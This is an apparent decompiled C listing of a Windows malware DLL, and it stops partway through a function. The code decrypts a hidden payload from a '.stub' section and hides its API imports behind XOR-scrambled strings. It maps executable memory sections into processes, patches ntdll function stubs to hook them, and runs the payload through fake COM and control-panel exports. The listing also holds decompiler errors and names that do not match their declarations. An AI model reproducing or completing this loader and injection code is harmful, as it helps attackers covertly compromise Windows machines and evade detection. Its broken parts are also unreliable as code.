Detected compiler: Visual C++

*/

#include <windows.h>
#include <defs.h>

//-------------------------------------------------------------------------
// Data declarations

extern int dword_10001A90[8]; // weak

extern char *off_10001AB2; // weak
extern char byte_10001AB9[3]; // weak
extern char byte_10001B87; // weak

typedef struct {
HMODULE Handle_NtdllDll; // weak
DWORD field_4;
int (__stdcall *proc_lstrcmpiW)(LPCTSTR lpString1, LPCTSTR lpString2); // weak
SIZE_T (__stdcall *proc_VirtualQuery)(LPCVOID lpAddress,
PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); // weak
BOOL (__stdcall *proc_VirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD
flNewProtect, PDWORD lpflOldProtect); // weak
FARPROC (__stdcall *proc_GetProcAddress)(HMODULE hModule, LPCSTR
lpProcName); // weak
LPVOID (__stdcall *proc_MapViewOfFile)(HANDLE hFileMappingObject, DWORD
dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T
dwNumberOfBytesToMap); // weak
BOOL (__stdcall *proc_UnmapViewOfFile)(LPCVOID lpBaseAddress); // weak
BOOL (__stdcall *proc_FlushInstructionCache)(HANDLE hProcess, LPCVOID
lpBaseAddress, SIZE_T dwSize); // weak
HMODULE (__stdcall *proc_LoadLibraryW)(LPCTSTR lpFileName); // weak
BOOL (__stdcall *proc_FreeLibrary)(HMODULE hModule); // weak
NTSTATUS (__stdcall *proc_ZwCreateSection)(PHANDLE SectionHandle, ACCESS_MASK
DesiredAccess, DWORD ObjectAttributes, PLARGE_INTEGER MaximumSize, ULONG
SectionPageProtection, ULONG AllocationAttributes, HANDLE FileHandle); // weak
NTSTATUS (__stdcall *proc_ZwMapViewOfSection)(HANDLE SectionHandle, HANDLE
ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize,
PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG
AllocationType, ULONG Win32Protect); // weak
HANDLE (__stdcall *proc_CreateThread)(LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter,
DWORD dwCreationFlags, LPDWORD lpThreadId); // weak
DWORD (__stdcall *proc_WaitForSingleObject)(HANDLE hHandle, DWORD
dwMilliseconds); // weak
BOOL (__stdcall *proc_GetExitCodeThread)(HANDLE hThread, LPDWORD
lpExitCode); // weak
NTSTATUS (__stdcall *proc_ZwClose)(HANDLE Handle); // weak
} obfuscatedImports;

extern obfuscatedImports Imports;

//obfuscated strings
// see Scramble_Bytes and Scramble_Words
// obfb - ascii (byte)
// obfw - unicode (word)
extern BYTE obfb_Kernel32dll_aslr[48]; // weak
extern BYTE obfb_lstrcmpiW[20]; // weak
extern BYTE obfb_VirtualQuery[28]; // weak
extern BYTE obfb_VirtualProtect[32]; // weak
extern BYTE obfb_GetProcAddress[32]; // weak
extern BYTE obfb_MapViewOfFile[28]; // weak
extern BYTE obfb_UnmapViewOfFile[32]; // weak
extern BYTE obfb_FlushInstructionCache[44]; // weak
extern BYTE obfb_LoadLibraryW[28]; // weak
extern BYTE obfb_FreeLibrary[24]; // weak
extern BYTE obfb_ZwCreateSection[32]; // weak
extern BYTE obfb_ZwMapViewOfSection[40]; // weak
extern BYTE obfb_CreateThread[28]; // weak
extern BYTE obfb_WaitForSingleObject[40]; // weak
extern BYTE obfb_GetExitCodeThread[36]; // weak
extern BYTE obfb_ZwClose[16]; // weak
extern BYTE obfb_CreateRemoteThread[40]; // weak
extern BYTE obfb_NtCreateThreadEx[36]; // weak
extern BYTE obfw_kernel32_dll[28]; // weak
extern BYTE obfw_ntdll_dll[20]; // weak

extern char String2[]; // idb

extern int dword_10004000; // weak
extern int dword_10004010; // weak
extern _DWORD dword_10004014; // idb
extern _UNKNOWN unk_10004018; // weak
extern int dword_1000401C; // weak

//-------------------------------------------------------------------------
// Function declarations

#define __thiscall __cdecl // Test compile in C mode

BOOL __stdcall DllUnregisterServerEx(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID

lpReserved);
HRESULT __stdcall DllCanUnloadNow();
HRESULT __stdcall DllGetClassObject(const IID *const rclsid, const IID *const riid,
LPVOID *ppv);
signed int __cdecl DllRegisterServerEx();
signed int __stdcall CPlApplet(int a1);
BOOL __stdcall DllGetClassObjectEx(int a1, int a2, int a3, int a4);
signed int __cdecl sub_1000109B();
static void Scramble_ByteSequence(byte *buffer, unsigned int Key);
//void __usercall Scramble_ByteSequence<eax>(byte *buffer<ecx>, unsigned int
Key<edi>)
signed int __cdecl sub_10001161(int a1, int a2);
BOOL __cdecl sub_100011EE();
signed int __cdecl GetNeededProcAddresses();
signed int __cdecl CreateSectionAndView(HANDLE ProcessHandle, ULONG_PTR a2, PHANDLE
SectionHandle, PVOID *BaseAddress0, PVOID *BaseAddress1);
int __cdecl sub_10001456(void **a1, int a2, int a3, int a4, const void *a5,
unsigned int a6);
int __cdecl sub_100014A4(int, LPCWSTR lpString2); // idb
int __cdecl sub_10001559(int a1, const void *a2, const void *a3, unsigned int a4,
int a5, const void *a6, unsigned int a7, int a8);
signed int __cdecl sub_100016A5(int a1, int a2, const void *a3);
unsigned int __cdecl sub_100017BE();
signed int (__cdecl *__cdecl sub_100017CD())(int);
unsigned int __cdecl sub_100017D7();
unsigned int __cdecl sub_100017E6();
int __cdecl sub_100017F5(int a1, int a2, int a3, int a4);
int __cdecl sub_10001969(LPCWSTR lpString2, const void *a2, unsigned int a3, int
a4);
void __fastcall sub_10001DAF(int a1, int a2);
obfuscatedImports * __cdecl GetHandleToNtdll();
// int __usercall sub_10001E44<eax>(int a1<eax>, int a2<edx>, int a3<ecx>);
void __cdecl Scramble_Bytes(BYTE * input, char * output);
void __cdecl Scramble_Words(WORD * input, wchar_t * output);
HMODULE __cdecl AcquireHandleToNtdll();
FARPROC __cdecl GetScrambledProcAddress(WORD * Module, BYTE * Proc);
void __cdecl memcpy_wrapper_1(void *Dst, const void *Src, unsigned int Size);
FARPROC __cdecl GetScrambledProcAddressFromKernel32(BYTE * Proc);
FARPROC __cdecl GetScrambledProcAddressFromNtdll(BYTE * Proc);
signed int __cdecl sub_10002060(int a1);
int __stdcall sub_100021FE(int a1);
int __cdecl sub_10002271(int a1, int a2, int a3);
signed int __stdcall sub_10002334(int a1);
void __cdecl memcpy_wrapper_2(void *a1, const void *a2, unsigned int a3);
int __cdecl sub_100024A7(const void *a1, int a2, void *a3);
signed int __cdecl sub_10002529(int a1, int a2);
signed int __cdecl sub_100025C7(int a1, int a2, const void *a3, int a4);
void __cdecl sub_100026A8();
// void __stdcall ExitProcess(UINT uExitCode);
// BOOL __stdcall FreeLibrary(HMODULE hLibModule);
// HMODULE __stdcall GetModuleHandleW(LPCWSTR lpModuleName);
// BOOL __stdcall GetVersionExW(LPOSVERSIONINFOW lpVersionInformation);
// int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2);
// FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName);
// BOOL __stdcall DeleteFileA(LPCSTR lpFileName);
// BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD
flNewProtect, PDWORD lpflOldProtect);
// HANDLE __stdcall GetCurrentProcess();
// DWORD __stdcall GetCurrentThreadId();
// DWORD __stdcall GetTickCount();
// LPWSTR __stdcall lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2);
// int __stdcall lstrlenW(LPCWSTR lpString);
// int wsprintfW(LPWSTR, LPCWSTR, ...);

//----- (1000101B) --------------------------------------------------------

BOOL __stdcall DllUnregisterServerEx(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID
lpReserved)
{
if ( fdwReason )
{
if ( fdwReason == 1 )
{
dword_1000401C = (int)hinstDLL;
sub_100011EE();
}
}
return 0;
}
// 1000401C: using guessed type int dword_1000401C;

//----- (1000103D) --------------------------------------------------------

HRESULT __stdcall DllCanUnloadNow()
{
dword_1000401C = (int)GetModuleHandleW(0);
sub_100011EE();
ExitProcess(0);
}
// 1000401C: using guessed type int dword_1000401C;

//----- (1000105B) --------------------------------------------------------

HRESULT __stdcall DllGetClassObject(const IID *const rclsid, const IID *const riid,
LPVOID *ppv)
{
return sub_100011EE();
}
// 1000105B: inconsistent function type and number of purged bytes

//----- (10001064) --------------------------------------------------------

signed int __cdecl DllRegisterServerEx()
{
sub_100011EE();
return 1;
}

//----- (10001070) --------------------------------------------------------

signed int __stdcall CPlApplet(int a1)
{
if ( *(_DWORD *)(a1 + 8) )
DeleteFileA(*(LPCSTR *)(a1 + 8));
sub_100011EE();
return 1;
}

//----- (10001090) --------------------------------------------------------

BOOL __stdcall DllGetClassObjectEx(int a1, int a2, int a3, int a4)
{
return sub_100011EE();
}

//----- (1000109B) --------------------------------------------------------

signed int __cdecl sub_1000109B()
{
signed int result; // eax@1
int v1; // esi@2
FARPROC v2; // eax@3
int v3; // [sp+0h] [bp-Ch]@1
int v4; // [sp+4h] [bp-8h]@1
HMODULE hLibModule; // [sp+8h] [bp-4h]@2

result = sub_10001161((int)&v4, (int)&v3);

if ( result )
{
v1 = v4;
Scramble_ByteSequence(v4 + *(_DWORD *)v4, *(_DWORD *)(v4 + 4));
result = sub_10001969(0, (const void *)(v1 + *(_DWORD *)v1), *(_DWORD *)(v1
+ 4), (int)&hLibModule);
if ( !result )
{
v2 = GetProcAddress(hLibModule, (LPCSTR)0xF);
if ( v2 )
((void (__cdecl *)(int, int))v2)(v1, v3);
result = FreeLibrary(hLibModule);
}
}
return result;
}

//----- (10001103) --------------------------------------------------------

void __usercall Scramble_ByteSequence<eax>(byte *buffer<ecx>, unsigned int
Key<edi>)
{
unsigned int v2; // edx@2
unsigned int v3; // eax@4
unsigned int v4; // eax@6
signed int v6; // [sp+8h] [bp-8h]@1
unsigned int v7; // [sp+Ch] [bp-4h]@1

v7 = key >> 1;
v6 = 4;
do
{
v2 = 0;
if ( key )
{
do
{
buffer[v2] ^= 0x96 * (_BYTE)v2;
++v2;
}
while ( v2 < key );
}
v3 = 0;
if ( v7 )
{
do
{
buffer[v3] ^= *(&buffer[(key + 1) >> 1] + v3);
++v3;
}
while ( v3 < v7 );
}
for ( v4 = key - 1; v4 >= 1; --v4 )
buffer[v4] -= buffer[v4 - 1];
}
while ( v6-- - 1 >= 0 );
}

//----- (10001161) --------------------------------------------------------

signed int __cdecl sub_10001161(int a1, int a2)
{
signed int result; // eax@2
int v3; // esi@3
signed int v4; // ebx@5
int v5; // edi@5
unsigned int v6; // ecx@10
int v7; // eax@11

if ( *(_WORD *)dword_1000401C == 23117 )

{
v3 = dword_1000401C + *(_DWORD *)(dword_1000401C + 60);
if ( *(_DWORD *)v3 == 17744 )
{
v5 = *(_WORD *)(v3 + 20) + v3 + 24;
v4 = 0;
 if ( *(_WORD *)(v3 + 6) <= 0u )
goto LABEL_8;
while ( lstrcmpiA((LPCSTR)v5, ".stub") )
{
++v4;
v5 += 40;
if ( v4 >= *(_WORD *)(v3 + 6) )
goto LABEL_8;
}
v6 = *(_DWORD *)(v5 + 8);
if ( v6 < 0x22C || (v7 = dword_1000401C + *(_DWORD *)(v5 + 12),
*(_DWORD *)v7 != -1371991539) )
{
LABEL_8:
result = 0;
}
else
{
*(_DWORD *)a1 = v7 + 4;
*(_DWORD *)a2 = v6 - 4;
result = 1;
}
}
else
{
result = 0;
}
}
else
{
result = 0;
}
return result;
}
// 1000401C: using guessed type int dword_1000401C;

//----- (100011EE) --------------------------------------------------------

BOOL __cdecl sub_100011EE()
{
BOOL result; // eax@1
struct _OSVERSIONINFOW VersionInformation; // [sp+0h] [bp-114h]@1

VersionInformation.dwOSVersionInfoSize = 276;
result = GetVersionExW(&VersionInformation);
if ( result )
{
if ( VersionInformation.dwPlatformId == 2 )
{
if ( VersionInformation.dwMajorVersion >= 5 ||
VersionInformation.dwMajorVersion <= 6 )
result = sub_1000109B();
}
}
return result;
}

//----- (1000126B) --------------------------------------------------------

signed int __cdecl GetNeededProcAddresses()
{
 DWORD flOldProtect; // [sp+0h] [bp-4h]@1

if ( VirtualProtect(&Imports, sizeof(Imports), PAGE_EXECUTE_WRITECOPY,

&flOldProtect)
|| VirtualProtect(&Imports, sizeof(Imports), PAGE_EXECUTE_READWRITE,
&flOldProtect) )
{
Imports.Handle_NtdllDll = GetModuleHandleToNtdll();
Imports.proc_lstrcmpiW = (int (__stdcall *)(LPCTSTR,
LPCTSTR))GetProcAddressInKernel32(obfb_lstrcmpiW);
Imports.proc_VirtualQuery = (SIZE_T (__stdcall *)(LPCVOID,
PMEMORY_BASIC_INFORMATION, SIZE_T))GetProcAddressInKernel32(obfb_VirtualQuery);
Imports.proc_VirtualProtect = (BOOL (__stdcall *)(LPVOID, SIZE_T, DWORD,
PDWORD))GetProcAddressInKernel32(obfb_VirtualProtect);
Imports.proc_GetProcAddress = (FARPROC (__stdcall *)(HMODULE,
LPCSTR))GetProcAddressInKernel32(obfb_GetProcAddress);
Imports.proc_MapViewOfFile = (LPVOID (__stdcall *)(HANDLE, DWORD, DWORD, DWORD,
SIZE_T))GetProcAddressInKernel32(obfb_MapViewOfFile);
Imports.proc_UnmapViewOfFile = (BOOL (__stdcall *)
(LPCVOID))GetProcAddressInKernel32(obfb_UnmapViewOfFile);
Imports.proc_FlushInstructionCache = (BOOL (__stdcall *)(HANDLE, LPCVOID,
SIZE_T))GetProcAddressInKernel32(obfb_FlushInstructionCache);
Imports.proc_LoadLibraryW = (HMODULE (__stdcall *)
(LPCTSTR))GetProcAddressInKernel32(obfb_LoadLibraryW);
Imports.proc_FreeLibrary = (BOOL (__stdcall *)
(HMODULE))GetProcAddressInKernel32(obfb_FreeLibrary);
Imports.proc_ZwCreateSection = (NTSTATUS (__stdcall *)(PHANDLE, ACCESS_MASK,
DWORD, PLARGE_INTEGER, ULONG, ULONG,
HANDLE))GetProcAddressInNtdll(obfb_ZwCreateSection);
Imports.proc_ZwMapViewOfSection = (NTSTATUS (__stdcall *)(HANDLE, HANDLE, PVOID
*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG,
ULONG))GetProcAddressInNtdll(obfb_ZwMapViewOfSection);
Imports.proc_CreateThread = (HANDLE (__stdcall *)(LPSECURITY_ATTRIBUTES,
SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD,
LPDWORD))GetProcAddressInKernel32(obfb_CreateThread);
Imports.proc_WaitForSingleObject = (DWORD (__stdcall *)(HANDLE,
DWORD))GetProcAddressInKernel32(obfb_WaitForSingleObject);
Imports.proc_GetExitCodeThread = (BOOL (__stdcall *)(HANDLE,
LPDWORD))GetProcAddressInKernel32(obfb_GetExitCodeThread);
Imports.proc_ZwClose = (NTSTATUS (__stdcall *)
(HANDLE))GetProcAddressInNtdll(obfb_ZwClose);
return 1;
}
return 0;
}

//----- (100013A6) --------------------------------------------------------

signed int __cdecl CreateSectionAndView(HANDLE ProcessHandle, ULONG_PTR a2, PHANDLE
SectionHandle, PVOID *BaseAddress0, PVOID *BaseAddress1)
{
signed int result; // eax@2
HANDLE v6; // eax@3
ULONG_PTR ViewSize; // [sp+0h] [bp-10h]@1
NTSTATUS v8; // [sp+4h] [bp-Ch]@3
LARGE_INTEGER MaximumSize; // [sp+8h] [bp-8h]@1

ViewSize = a2;
MaximumSize = (LARGE_INTEGER)a2;
if ( Imports.proc_ZwCreateSection(
 SectionHandle,
SECTION_EXTEND_SIZE|SECTION_MAP_EXECUTE|SECTION_MAP_READ|
SECTION_MAP_WRITE|SECTION_QUERY|0xF0000,
0,
&MaximumSize,
0x40u,
0x8000000u,
0) )
{
result = -5;
}
else
{
v6 = GetCurrentProcess();
v8 = Imports.proc_ZwMapViewOfSection(*SectionHandle, v6, BaseAddress0, 0, 0, 0,
&ViewSize, 1u, 0, 0x40u);
if ( v8 )
{
result = -5;
}
else
{
v8 = Imports.proc_ZwMapViewOfSection(
*SectionHandle,
ProcessHandle,
BaseAddress1,
0,
0,
0,
&ViewSize,
1u,
0,
0x40u);
if ( v8 )
result = -5;
else
result = 0;
}
}
return result;
}

//----- (10001456) --------------------------------------------------------

int __cdecl sub_10001456(void **a1, int a2, int a3, int a4, const void *a5,
unsigned int a6)
{
int result; // eax@3

if ( a6 )
memcpy_wrapper_1(*a1, a5, a6);
*(_DWORD *)a4 = *(_DWORD *)a3 + a2;
*(_DWORD *)(a4 + 4) = a6;
*a1 = (char *)*a1 + a6;
result = a6 + *(_DWORD *)a3;
*(_DWORD *)a3 = result;
return result;
}

//----- (100014A4) --------------------------------------------------------

signed int __cdecl sub_100014A4(int a1, LPCWSTR lpString2)
{
DWORD v3; // esi@5
wchar_t Unscrambled[42];
DWORD v5; // [sp+5Ch] [bp-4h]@5

if ( lpString2 )
{
if ( lstrlenW(lpString2) >= 31 )
return -1;
lstrcpyW((LPWSTR)(a1 + 16), lpString2);
}
else
{
v3 = GetTickCount();
v5 = 3 * GetCurrentThreadId() + v3;
Scramble_Words(obfb_Kernel32dll_aslr, Unscrambled);
do
wsprintfW((LPWSTR)(a1 + 16), Unscrambled, v5++);
while ( GetModuleHandleW((LPCWSTR)(a1 + 16)) );
}
*(_DWORD *)a1 = a1 ^ 0xAE1979DD;
*(_DWORD *)(a1 + 4) = 0;
*(_DWORD *)(a1 + 12) = sub_10002334;
return 0;
}

//----- (10001559) --------------------------------------------------------

int __cdecl sub_10001559(int a1, const void *a2, const void *a3, unsigned int a4,
int a5, const void *a6, unsigned int a7, int a8)
{
int result; // eax@2
int v9; // [sp+4h] [bp-28h]@1
int v10; // [sp+8h] [bp-24h]@3
int v11; // [sp+Ch] [bp-20h]@6
int v12; // [sp+10h] [bp-1Ch]@1
int v13; // [sp+14h] [bp-18h]@1
int v14; // [sp+18h] [bp-14h]@3
unsigned int v15; // [sp+1Ch] [bp-10h]@1
int v16; // [sp+20h] [bp-Ch]@1
int v17; // [sp+24h] [bp-8h]@3
int v18; // [sp+28h] [bp-4h]@1

v13 = 0;
v16 = 0;
v12 = 0;
v15 = a4 + a7 + 152;
v18 = CreateSectionAndView(a1, a4 + a7 + 152, (PHANDLE)&v9, (PVOID)&v13,
(PVOID)&v16);
if ( v18 )
{
result = v18;
}
else
{
v17 = v13;
v13 += 152;
v12 = 152;
sub_10001456((void **)&v13, v16, (int)&v12, v17 + 132, a6, a7);
 v10 = v13;
sub_10001456((void **)&v13, v16, (int)&v12, v17 + 140, a3, a4);
v14 = v10;
if ( a4 >= 0x1000 )
{
if ( *(_WORD *)v14 == 23117 )
{
if ( *(_DWORD *)(v14 + 60) + 248 < a4 )
{
v11 = *(_DWORD *)(v14 + 60) + v10;
if ( *(_DWORD *)(v11 + 204) == 72 )
*(_DWORD *)(v11 + 204) = 64;
}
}
}
memcpy_wrapper_1((void *)v17, a2, 0x80u);
*(_DWORD *)(v17 + 148) = a5;
*(_DWORD *)(v17 + 128) = 0;
*(_DWORD *)a8 = v16;
Imports.proc_UnmapViewOfFile(v17);
Imports.proc_ZwClose(v9);
result = 0;
}
return result;
}

//----- (100016A5) --------------------------------------------------------

signed int __cdecl sub_100016A5(int a1, int a2, const void *a3)
{
signed int result; // eax@2
int v4; // [sp+0h] [bp-90h]@5
int v5; // [sp+4h] [bp-8Ch]@7
signed int v6; // [sp+8h] [bp-88h]@1
int v7; // [sp+Ch] [bp-84h]@1
unsigned int v8; // [sp+10h] [bp-80h]@1
int v9; // [sp+14h] [bp-7Ch]@1
int v10; // [sp+18h] [bp-78h]@7
char v11; // [sp+20h] [bp-70h]@5

memcpy_wrapper_1(&v8, a3, 0x80u);

v8 = (unsigned int)&v8 ^ 0xAE1979DD;
v9 = 0;
v7 = (char *)&dword_10001F1A + *(_DWORD *)(a1 + 8) - byte_10001AB9;
v6 = sub_100025C7(
(char *)&dword_10001F1A + *(_DWORD *)(a1 + 8) - byte_10001AB9,
(int)&v8,
*(const void **)(a2 + 140),
*(_DWORD *)(a2 + 144));
if ( v6 )
{
result = v6;
}
else
{
if ( sub_10002529(a1, v7) )
{
result = -4;
}
else
 {
v4 = (*(int (__stdcall **)(char *))(v7 + 36))(&v11);
if ( v4 )
{
*(_DWORD *)(a2 + 128) = v4;
v5 = v10;
if ( v10 )
{
v10 = 0;
(*(void (__stdcall **)(int))(v7 + 64))(v5);
}
result = 0;
}
else
{
result = -9;
}
}
}
return result;
}
// 10001F1A: using guessed type int dword_10001F1A;

//----- (100017BE) --------------------------------------------------------

unsigned int __cdecl sub_100017BE()
{
return (char *)sub_100026A8 - (char *)(void (__cdecl *)())sub_10002060;
}

//----- (100017CD) --------------------------------------------------------

signed int (__cdecl *__cdecl sub_100017CD())(int)
{
return sub_10002060;
}

//----- (100017D7) --------------------------------------------------------

unsigned int __cdecl sub_100017D7()
{
return (char *)sub_100021FE - (char *)(int (__stdcall *)(int))sub_10002060;
}

//----- (100017E6) --------------------------------------------------------

unsigned int __cdecl sub_100017E6()
{
return (char *)sub_10002334 - (char *)(signed int (__stdcall *)
(int))sub_10002060;
}

//----- (100017F5) --------------------------------------------------------

int __cdecl sub_100017F5(int a1, int a2, int a3, int a4)
{
int result; // eax@2
unsigned int v5; // ST14_4@3
signed int (__cdecl *v6)(int); // eax@3
int v7; // [sp+8h] [bp-28h]@1
int v8; // [sp+Ch] [bp-24h]@3
unsigned int v9; // [sp+10h] [bp-20h]@3
int v10; // [sp+14h] [bp-1Ch]@1
int v11; // [sp+18h] [bp-18h]@1
 unsigned int v12; // [sp+1Ch] [bp-14h]@1
int v13; // [sp+20h] [bp-10h]@1
int v14; // [sp+24h] [bp-Ch]@3
unsigned int v15; // [sp+28h] [bp-8h]@1
int v16; // [sp+2Ch] [bp-4h]@1

v11 = 0;
v13 = 0;
v15 = sub_100017BE();
v12 = v15
+ (char *)sub_10001F5E
- (char *)(int (__cdecl *)(int, int))byte_10001AB9
+ byte_10001AB9
- (char *)dword_10001A90
+ 36;
v10 = 0;
v16 = CreateSectionAndView(
a1,
v12,
(PHANDLE)&v7,
(PVOID)&v11,
(PVOID)&v13);
if ( v16 )
{
result = v16;
}
else
{
v14 = v11;
v11 += 36;
v10 = 36;
sub_10001456(
(void **)&v11,
v13,
(int)&v10,
v14 + 8,
byte_10001AB9,
(char *)sub_10001F5E - (char *)(int (__cdecl *)(int,
int))byte_10001AB9);
v8 = v10;
sub_10001456((void **)&v11, v13, (int)&v10, v14 + 24, dword_10001A90,
byte_10001AB9 - (char *)dword_10001A90);
v5 = v15;
v6 = sub_100017CD();
sub_10001456((void **)&v11, v13, (int)&v10, v14 + 16, v6, v5);
v9 = (char *)&off_10001AB2 - (char *)dword_10001A90 + v8 + v14;
*(_DWORD *)((char *)&off_10001AB2 - (char *)dword_10001A90 + v8 + v14) =
*(_DWORD *)(v14 + 8)
+ &byte_10001B87
- byte_10001AB9;
*(_DWORD *)v14 = *(_DWORD *)(v14 + 16) + sub_100017D7();
*(_DWORD *)(v14 + 4) = *(_DWORD *)(v14 + 16) + sub_100017E6();
*(_DWORD *)(v14 + 32) = a2;
*(_DWORD *)a3 = *(_DWORD *)(v14 + 16);
*(_DWORD *)a4 = v13;
Imports.proc_UnmapViewOfFile(v14);
Imports.proc_ZwClose(v7);
result = 0;
}
 return result;
}
// 10001A90: using guessed type int dword_10001A90[8];
// 10001AB2: using guessed type char *off_10001AB2;
// 10001B87: using guessed type char byte_10001B87;
// 10001F36: using guessed type int (__stdcall *dword_10001F36)(_DWORD);
// 10001F5A: using guessed type int (__stdcall *dword_10001F5A)(_DWORD);

//----- (10001969) --------------------------------------------------------

int __cdecl sub_10001969(LPCWSTR lpString2, const void *a2, unsigned int a3, int
a4)
{
int result; // eax@1
int v5; // eax@6
int v6; // ST14_4@9
int v7; // eax@9
DWORD v8; // [sp-4h] [bp-88h]@1
int v9; // [sp+0h] [bp-84h]@6
int v10; // [sp+0h] [bp-84h]@9
signed int v11; // [sp+0h] [bp-84h]@12
int v12; // [sp+4h] [bp-80h]@1

result = sub_100014A4((int)&v12, lpString2);

if ( !result )
{
if ( dword_10004000 && !GetNeededProcAddresses() )
return -12;
v5 = (int)GetCurrentProcess();
v9 = sub_10001559(v5, &v12, a2, a3, -1, 0, 0, (int)&dword_10004014);
if ( v9 )
return v9;
if ( dword_10004000 )
{
v6 = dword_10004014;
v7 = (int)GetCurrentProcess();
v10 = sub_100017F5(v7, v6, (int)&unk_10004018, (int)&dword_10004010);
if ( v10 )
return v10;
dword_10004000 = 0;
}
v11 = sub_100016A5(dword_10004010, dword_10004014, &v12);
if ( !v11 )
*(_DWORD *)a4 = *(_DWORD *)(dword_10004014 + 128);
Imports.proc_UnmapViewOfFile(dword_10004014);
result = v11;
}
return result;
}
// 10001F36: using guessed type int (__stdcall *dword_10001F36)(_DWORD);
// 10004000: using guessed type int dword_10004000;
// 10004010: using guessed type int dword_10004010;

//----- (10001AB6) --------------------------------------------------------

#error "FFFFFFFF: positive sp value has been found (funcsize=0)"

//----- (10001B78) --------------------------------------------------------

#error "FFFFFFFF: positive sp value has been found (funcsize=0)"

//----- (10001DAF) --------------------------------------------------------

void __fastcall sub_10001DAF(int a1, int a2)
{
unsigned int v2; // esi@1
int v3; // edx@1
int v4; // eax@3
int *v5; // [sp+4h] [bp-38h]@1
signed int v6; // [sp+8h] [bp-34h]@1
int v7; // [sp+Ch] [bp-30h]@1
int v8; // [sp+18h] [bp-24h]@2
int v9; // [sp+28h] [bp-14h]@1
int v10; // [sp+2Ch] [bp-10h]@1
char v11; // [sp+30h] [bp-Ch]@1

obfuscatedImports * Imports;

v10 = a1;
v9 = a2;
v6 = 28;
v5 = &v7;
Imports = GetHandleToNtdll();
Imports->proc_VirtualQuery(&v5, v5, v6);
v2 = (unsigned int)&v11;
do
{
if ( v2 >= v8 + v7 )
break;
v4 = *(_DWORD *)v2;
v2 += 4;
}
while ( (v4 ^ 0xAE1979DD) + 4 != v2 );
}

//----- (10001DF1) --------------------------------------------------------

obfuscatedImports * __cdecl GetHandleToNtdll()
{
return (obfuscatedImports *)&Handle_Ntdll_dll;
}

//----- (10001E44) --------------------------------------------------------

int __usercall sub_10001E44<eax>(int a1<eax>, int a2<edx>, int a3<ecx>)
{
int v3; // eax@1
int v4; // ecx@1
int v5; // edx@1
int v6; // eax@2
int v7; // edx@2
int v8; // ecx@2
int v9; // ST00_4@2
int v10; // edx@2
int v11; // edx@11
int v12; // eax@11
int v15; // [sp-10h] [bp-10h]@2
int v16; // [sp-Ch] [bp-Ch]@1
int v17; // [sp-8h] [bp-8h]@1
int v18; // [sp-4h] [bp-4h]@1
obfuscatedImports * Imports;

v18 = a1;
v17 = a3;
v16 = a2;
Imports = GetHandleToNtdll();
Imports->field_4 = 0;
v3 = Imports->proc_GetProcAddress(Imports->Handle_Ntdll_dll, v16);
v4 = v17;
if ( v3 )
{
v17 = v3;
v16 = v4;
v15 = v3;
v9 = v3;
Imports = GetHandleToNtdll();
v7 = Imports->proc_VirtualProtect(v9, 24, PAGE_EXECUTE_WRITECOPY, &v15);
v8 = v16;
v6 = v17;
if ( v7 )
{
if ( *(_BYTE *)v17 == -72 )
{
if ( *(_BYTE *)(v17 + 5) == -70 )
{
if ( *(_WORD *)(v17 + 10) != -11521 )
{
if ( *(_WORD *)(v17 + 10) != 4863 )
return v18;
*(_BYTE *)(v17 + 11) = -46;
}
*(_DWORD *)(v6 + 6) = v8;
return v18;
}
if ( *(_DWORD *)(v17 + 5) == 69489805 )
{
if ( *(_DWORD *)(v17 + 8) == -1037120252 )
{
*(_DWORD *)(v17 + 6) = v16 - v17 - 10;
*(_BYTE *)(v6 + 5) = -24;
*(_BYTE *)(v6 + 10) = -112;
}
}
else
{
if ( *(_DWORD *)(v17 + 7) == 69489805 )
{
if ( *(_DWORD *)(v17 + 11) == -1072300188 )
{
if ( *(_DWORD *)(v17 + 15) == -1040187392 )
{
v17 = v7;
Imports = GetHandleToNtdll();
Imports->field_4 = 1;
v16 = v12;
_ESI = v12;
__asm { lock cmpxchg8b qword ptr [esi+0Ah] }
}
}
}
}
}
 }
}
return v18;
}

//----- (10001F5E) --------------------------------------------------------

void __cdecl Scramble_Bytes(BYTE * input, char * output)
{
if ( input )
{
for( ; *output = *input ^ 0x12; ++output, input += 2) {}
}
else
{
*output = 0;
}
}

//----- (10001F81) --------------------------------------------------------

void __cdecl Scramble_Words(WORD * input, wchar_t * output)
{
if ( input )
{
for(; *output = *input ^ 0xAE12; ++input, ++output) {}
}
else
{
*output = 0;
}
}

//----- (10001FBE) --------------------------------------------------------

HMODULE __cdecl AcquireHandleToNtdll()
{
wchar_t ModuleName[100];

Scramble_Words(obfw_ntdll_dll, ModuleName);
return GetModuleHandleW(ModuleName);
}

//----- (10001FE9) --------------------------------------------------------

FARPROC __cdecl GetScrambledProcAddress(WORD * Module, BYTE * Proc)
{
HMODULE hModule;
wchar_t ModuleName[100];
char ProcName[100];

Scramble_Words(Module, ModuleName);
Scramble_Bytes(Proc, ProcName);
hModule = GetModuleHandleW(ModuleName);
return GetProcAddress(hModule, ProcName);
}

//----- (1000202A) --------------------------------------------------------

void __cdecl memcpy_wrapper_1(void *Dst, const void *Src, unsigned int Size)
{
memcpy(Dst, Src, Size);
}
 //----- (1000203E) --------------------------------------------------------
FARPROC __cdecl GetScrambledProcAddressFromKernel32(BYTE * Proc)
{
return GetScrambledProcAddress(obfw_kernel32_dll, Proc);
}

//----- (1000204F) --------------------------------------------------------

FARPROC __cdecl GetScrambledProcAddressFromNtdll(BYTE * Proc)
{
return GetScrambledProcAddress(obfw_ntdll_dll, Proc);
}

//----- (10002060) --------------------------------------------------------

signed int __cdecl sub_10002060(int a1)
{
int v2; // [sp-4h] [bp-9Ch]@3
